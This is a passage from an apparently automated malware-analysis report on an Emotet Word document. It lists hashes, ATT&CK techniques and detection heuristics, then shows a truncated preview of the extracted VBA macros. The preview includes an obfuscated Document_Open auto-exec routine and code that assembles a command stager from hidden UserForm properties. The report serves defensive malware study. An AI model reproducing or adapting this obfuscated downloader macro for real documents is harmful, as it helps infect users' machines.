Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 b45a65072e2ff22b…

MALICIOUS

Office (OLE)

Size: 200.9 KB
Created: 2019-12-18 16:47:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 359ce657f31239321ff89c623cb8c691
SHA-1: 40e084436dc351d8a5843bd405925515d661e6c2
SHA-256: b45a65072e2ff22b6d0b44be7134d0f68cde2d872106ceb04089cd2735dc53eb
Risk score: 262

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains VBA macros, specifically a Document_Open macro that utilizes CreateObject and a hidden UserForm property to execute a command stager. ClamAV identifies this as Doc.Downloader.Emotet-7464570-0, strongly suggesting the Emotet family. The macro's primary function appears to be downloading and executing a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-7464570-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7464570-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11189 bytes
SHA-256: 7d6b095b4dc46cfa520e93bab140334ee73eed756d3f75e02ffea0d469ad14c6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ktbzpwygnmjl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Sxdahqhm, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Vqkkqkdeedz = Sitdhosekwdb
Wkurgvkyexd = 157
Cmtdxgvvzv = ("Omnis nisi enim rerum.")
Sklluhjxuh = (528)
Dim Ltrjtevazf As Integer
Dim Qsfuxuwpohnl As Double
Dim Jqtlouskreo As Integer
Dim Uzflnutv As Boolean
Dim Ozakeveg As String
Dim Fufgnqvzga As Integer
Dim Lscpivaqf As String
Oflojoony = (191)
Dim Wauzxwyu As String
Ainhiomj = ("Temporibus eos eum.")
Fnmqbccmkrn = (650)
Dim Jvbujxdskdhow As Double
Bzcdsswio = Vumjxnxkdmgtc
Xukecedv = Ojkfmnnqlb
Afuqluuuf = "Eveniet dolor deserunt ad voluptatibus."
Qucxjcssybyi = 958
   Mknkfqopifhnc = Nnbxkclmrfasu
Qayiterwf = 925
Noyqfxxwwpbl = ("Assumenda asperiores.")
Byweeyticogo = (419)
Dim Rwqwsqpwnaacv As Integer
Dim Qopwnsfura As Boolean
Dim Emjkqdzf As Boolean
Dim Ftmeflvebdvxm As Boolean
Dim Sgfmbyvlqlje As Boolean
Dim Zvsksjwjjn As Integer
Dim Nzdegajsxxtty As Boolean
Hwtvhftchc = (196)
Dim Qvixsrckwhle As String
Xmcbzmsaonpr = ("Mabel")
Uxwbtgtwoabb = (367)
Dim Nzkplmhgafd As Boolean
Qhvhaejq = Kkdbaycayr
Odagalnxqyt = Ptsaxmxn
Ehlhixef = "Occaecati iusto a."
Csrgudxdbulqz = 1
   Fvvjkviqpi = Lwnhqlzdgll
Cexeaiqwjctp = 603
Tyzmzbuvrthgt = ("Deleniti explicabo voluptatem qui.")
Etkxrirlmoajt = (41)
Dim Trlpgegzlwxg As Integer
Dim Xtpdzfij As Boolean
Dim Ocnnxzrauxz As Double
Dim Egtxuzatbeho As Boolean
Dim Fuwlkzybeq As Boolean
Dim Mexmpehy As Integer
Dim Fhojrtmxgycom As Integer
Lpqwdbcetmwvp = (791)
Dim Hwahpoxa As String
Ogkuyysrn = ("Sapiente vero sed reprehenderit.")
Qchvcdvxvxw = (784)
Dim Qgneqkoo As Integer
Ovsjuoddbko = Tmmkbdmhrxhe
Nbdqahlsak = Jruuzpam
Ezmkxjwxlfbc = "Alias."
Ytnjialc = 504
Iobmoqajahxs
End Sub

Attribute VB_Name = "Vjgdknlt"
Attribute VB_Base = "0{5198C26E-EC35-48EC-B747-FBA047B9C264}{92B413BD-2514-4BCC-8A09-93C1A9E7EDC6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Nmgafsqbbgpfo"
Function Xnfdptigz()
   Khwraequogtos = Swljvmnpphxkf
Cuvlyrbmv = 777
Ewydnidjjb = ("Non.")
Ekxrgkctlc = (727)
Dim Zsgpgqjq As Double
Dim Irrmtphwjf As Double
Dim Qabavctwac As Boolean
Dim Dvbncsrdqucf As Boolean
Dim Qnmpsbvpbgof As Double
Dim Xwkgcwiyn As Double
Dim Qoetwyvzblfk As Double
Myotvywxjg = (126)
Dim Wcdlrztvcn As Boolean
Fitgtwrmzwqy = ("Vel illo repellat ut.")
Suwtfxzmb = (833)
Dim Qtgrphzhtnnfq As String
Pilzmfrmgyz = Twtgajcck
Pqqarfpfos = Abgqzhzsqyr
Ugehckembkvoq = "Enim nam modi qui."
Jttqlfse = 423
Zseadboojgk = Ktbzpwygnmjl.Sxdahqhm
   Cysuqjobxd = Slixnadfz
Pzhbpubzwqhu = 605
Evlixnknb = ("Placeat quis.")
Prcujrlsf = (725)
Dim Jhzhveirkqvr As Double
Dim Swbwibxfv As Boolean
Dim Zfmywchc As Double
Dim Ejqsffkqpu As String
Dim Oqujvxbydlze As String
Dim Vsonnpztonkec As Boolean
Dim Pgfdgqwdmg As String
Lisjmwgj = (11)
Dim Cgkuvchz As Boolean
Elofubpizocg = ("Quia consequatur debitis.")
Okwdxhvnumd = (406)
Dim Lvtwmpowzunp As String
Yjdavdvgk = Bjzqqbbvh
Fsproroqinm = Drmivxfknrlfp
Sltddkdkle = "Enim vel."
Rtxrpjcnz = 908
Onemonoegwjl = Zseadboojgk + Vjgdknlt.Spzrnfjqi + Vjgdknlt.Gwdnlcihm + Vjgdknlt.Hhzbdrrf
   Eabwvkjadca = Vxrujavv
Sgrkxreo = 826
Hzznukcn = ("Ipsum voluptatem et.")
Pyluvfyqoe = (873)
Dim Czipdaljzonm As String
Dim Ydzzxhdtluvx As Integer
Dim Snzihpxaffgb As Double
Dim Jalyaahvrp As Integer
Dim Ojnougmsqlo As String
Dim Exyxusvft As Integer
Dim Iwwolxwkbt As Integer
Mrkapksxlht = (631)
Dim Jxwxliuz As Double
Xjxhtpedk = ("Woodrow")
Lgjsfvamzb = (151)
Dim Mczznplf As Integer
Mmqsczhgdi = Xqnfgnunddui
Tqrnzyvbu = Nsbesxui
Ilhjxlbgi = "Culpa ratione."
Hygqpp
... (truncated)